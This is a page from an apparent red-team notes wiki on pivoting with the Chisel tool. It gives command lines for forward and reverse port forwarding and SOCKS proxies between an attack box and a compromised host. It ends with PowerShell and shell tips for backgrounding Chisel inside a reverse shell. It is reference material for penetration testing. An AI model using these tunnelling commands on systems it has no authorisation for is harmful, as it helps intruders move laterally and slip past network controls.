Hackers Rest
  • Hacker's Rest
  • Tools & Cheatsheets
    • Cybersecurity YouTube Channels
  • Hacking Methodology
  • Hands-on Practice
  • Fundamentals
    • Network Fundamentals
    • Computer Fundamentals
  • Unix
    • Unix Fundamentals
    • Hardening & Setup
      • TMUX/Screen Cheatsheet
    • Red Team Notes
      • Enumeration
      • Getting Access
      • Privilege Escalation
      • Pivoting/Lateral Movement
      • Data Exfiltration
      • Persistence
    • Vim
  • Windows
    • Windows Fundamentals
    • PowerShell
    • Hardening & Setup
    • Red Team Notes
      • Enumeration
      • Getting Access
      • Privilege Escalation
      • Pivoting/Lateral Movement
      • Persistence
      • Data Exfiltration
      • Active Directory
        • Enumeration
        • Getting Access
        • Privilege Escalation
        • Persistence
      • Kerberos
      • Impacket
  • MacOS
    • MacOS Basics
    • Hardening & Configuration
    • Red Team Notes
      • Enumeration
      • Getting Access
      • Privilege Escalation
      • Persistence
  • Web
    • Burp Suite
    • DNS
    • Web Notes
      • Enumeration
      • Web Filter Bypass
      • Command Injection
      • Subdomain/Virtual Host Enumeration
      • The Web Application Hacker's Handbook
  • Mobile
    • iOS
    • Android
  • OS Agnostic
    • Basic Enumeration
    • Cryptography & Encryption
    • Network Hardware
    • OS Agnostic
    • OSINT
    • Password Cracking
      • Gathering the Hashes
      • Wordlist Manipulation
      • Cracking the Hashes
    • Pivoting
      • Chisel
      • Plink.exe
      • SSH
      • Sshuttle
      • Socat
    • Reverse Engineering & Binary Exploitation
      • Buffer Overflow
    • Scripting
      • Script Language Syntax
    • SQL
    • SSH & SCP
    • Steganography
    • Wireless
  • Unsorted
Powered by GitBook
On this page
  • Requirements
  • Advantages
  • Individual Port Forwarding
  • Reverse Individual Port Forwarding
  • Socks Proxy
  • Server Running on Attack Box
  • Chisel Server Running on Target
  • Forward Dynamic SOCKS Proxy
  • Reverse Dynamic SOCKS Proxy
  • Reverse Shell Tips
  • Run Chisel in the Background
  • References

Was this helpful?

Edit on GitHub
  1. OS Agnostic
  2. Pivoting

Chisel

Pivoting using Chisel

Requirements

Requires a copy of the Chisel binary on both the target and attacker systems.

Advantages

  • Chisel is a portable binary that can be run on many operating systems

    • Either system can host the chisel server on a chosen TCP port

    • Allows for a high amount of flexibility in situations where restrictions on connectivity exist

  • No dependencies on SSH daemons/services running on the target

  • Supports authenticated proxies to prevent unwanted connections.

Individual Port Forwarding

Example: A service on a compromised host is listening on $RPORT

  1. Run the Chisel server on the target and connect from the attack box

  2. Specify the port forward on the client

  3. Open a port on attack box and forward traffic to remote port

# Target Machine
./chisel server --port $SERV_PORT

# Attack Machine
./chisel client $targetIP:$SERV_PORT $LHOST:$LPORT:$RHOST:$RPORT

Open $LPORT on attack box and port forward to $RPORT on target

Reverse Individual Port Forwarding

Example: A service on a compromised host is listening on $LPORT

  1. Run the Chisel server on the attack box in reverse mode and connect from the target

  2. Specify the port forward on the target machine

  3. Open a port on attack box and forward traffic to remote port

# Attack Machine
./chisel server --reverse --port $SERV_PORT

# Target Machine
./chisel client $attackIP:$SERV_PORT R:$RPORT:$LHOST:$LPORT

Open $RPORT on attack box and forward to $LPORT on target through reverse connection.

Socks Proxy

Server Running on Attack Box

# Attack Machine
./chisel server --reverse --port 51234

# Target Machine
./chisel client $AttackIP:51234 R:127.0.0.1:54321:socks

Opens port 54321 on attack box as a reverse SOCKS proxy. Listens for connections from Chisel on this port.

Chisel Server Running on Target

# Target Machine
./chisel server --socks5 --port 51234

# Attack Machine
./chisel client $targetIP:51234 54321:socks

Open port 54321 on attack machine as a forward SOCKS proxy

Forward Dynamic SOCKS Proxy

  1. Run the Chisel server on the target box

  2. Use the target box as a jump host to reach additional targets routable by the target

The traffic flows forward to the target box, which acts as a transparent SOCKS proxy

# Target Machine
./chisel server --socks5 --port $SERV_PORT

# Attack Machine
./chisel client $targetIP:$SERV_PORT $LPORT:socks

Reverse Dynamic SOCKS Proxy

  1. Run the Chisel server on the attack box in reverse mode

  2. Connect to the Chisel server from the target and specify a reverse port forward

The traffic flows through the port on the attack box in reverse to the target box, which acts as a transparent SOCKS proxy

# Attack Machine
./chisel server --reverse --port $SERV_PORT

# Target Machine
./chisel client $attackIP:$SERV_PORT R:127.0.0.1:$LPORT:socks

Reverse Shell Tips

Run Chisel in the Background

Running chisel in the foreground in a reverse shell will render your shell useless. Background the process in order to continue to use the shell while forwarding traffic.

Linux

Background a process with '&'. Works for both client and server sides.

chisel server --port 8080 --reverse &

Windows - PowerShell

Client Side

# Use the Start-Job cmdlet with a script block
$background = { Start-Process C:\Windows\Temp\chisel.exe -ArgumentList @('client','10.0.0.2:8080','R:127.0.0.1:8800:127.0.0.1:80') }
Start-Job -ScriptBlock $background

Server Side

Note that in server mode, you'll need to make sure your port is allowed through the firewall.

# Use the Start-Job cmdlet with a script block
$background = { Start-Process C:\Windows\Temp\chisel.exe -ArgumentList @('server','--port 50001','--socks5') }
Start-Job -ScriptBlock $background

References

PreviousPivotingNextPlink.exe

Last updated 2 years ago

Was this helpful?

https://notes.benheater.com/books/network-pivoting/page/port-forwarding-with-chisel